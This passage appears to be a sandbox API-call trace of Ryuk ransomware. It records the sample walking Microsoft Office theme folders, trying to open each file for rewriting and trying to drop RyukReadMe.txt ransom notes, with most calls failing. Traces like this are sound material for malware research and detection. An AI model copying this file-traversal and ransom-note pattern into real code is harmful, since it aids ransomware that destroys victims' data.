returned 0xffffffffffffffff [0133.174] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.174] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.174] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.174] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.174] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.175] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.175] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.175] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.175] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.175] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.175] SetLastError (dwErrCode=0x0) [0133.175] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.176] GetLastError () returned 0x5 [0133.176] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.176] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.176] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.176] SetLastError (dwErrCode=0x0) [0133.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.176] GetLastError () returned 0x5 [0133.176] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.176] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.176] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.177] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.177] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.177] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM", dwFileAttributes=0x80) returned 0 [0133.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.178] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.178] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.178] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.178] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.179] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF", dwFileAttributes=0x80) returned 0 [0133.179] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.179] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.179] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.179] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.179] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.179] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.179] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.179] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.179] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.180] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.180] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.180] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.180] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.180] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.180] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.180] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.180] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.180] SetLastError (dwErrCode=0x0) [0133.180] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.180] GetLastError () returned 0x5 [0133.180] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.180] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.181] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.181] SetLastError (dwErrCode=0x0) [0133.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.181] GetLastError () returned 0x5 [0133.181] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.181] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.181] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.181] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.181] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.182] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.182] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM", dwFileAttributes=0x80) returned 0 [0133.182] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.182] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.182] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.182] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.182] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.182] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF", dwFileAttributes=0x80) returned 0 [0133.183] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.183] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.183] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.183] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.183] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.183] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.184] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.184] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.184] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.184] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.184] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.184] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.184] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.184] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.184] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.184] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.184] SetLastError (dwErrCode=0x0) [0133.184] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.185] GetLastError () returned 0x5 [0133.185] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.185] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.185] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.185] SetLastError (dwErrCode=0x0) [0133.185] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.185] GetLastError () returned 0x5 [0133.185] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.185] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.185] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.185] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.185] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.185] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.185] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM", dwFileAttributes=0x80) returned 0 [0133.186] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.186] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.186] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.186] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.186] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.186] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF", dwFileAttributes=0x80) returned 0 [0133.187] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\IRIS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\iris.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.187] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.187] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.187] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.187] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.188] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.188] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.188] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.188] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.188] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.188] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.188] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.188] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.188] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.188] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.188] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.189] SetLastError (dwErrCode=0x0) [0133.189] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.189] GetLastError () returned 0x5 [0133.189] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.189] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.189] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.189] SetLastError (dwErrCode=0x0) [0133.189] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.189] GetLastError () returned 0x5 [0133.189] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.189] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.189] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.190] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.190] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.190] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM", dwFileAttributes=0x80) returned 0 [0133.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.191] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.191] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.191] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.191] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF", dwFileAttributes=0x80) returned 0 [0133.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.191] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.191] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.191] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.191] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.192] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.192] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.192] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.192] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.192] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.192] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.192] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.192] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.193] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.193] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.193] SetLastError (dwErrCode=0x0) [0133.193] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.193] GetLastError () returned 0x5 [0133.193] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.193] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.193] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.193] SetLastError (dwErrCode=0x0) [0133.193] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.193] GetLastError () returned 0x5 [0133.193] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.193] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.193] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.194] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: 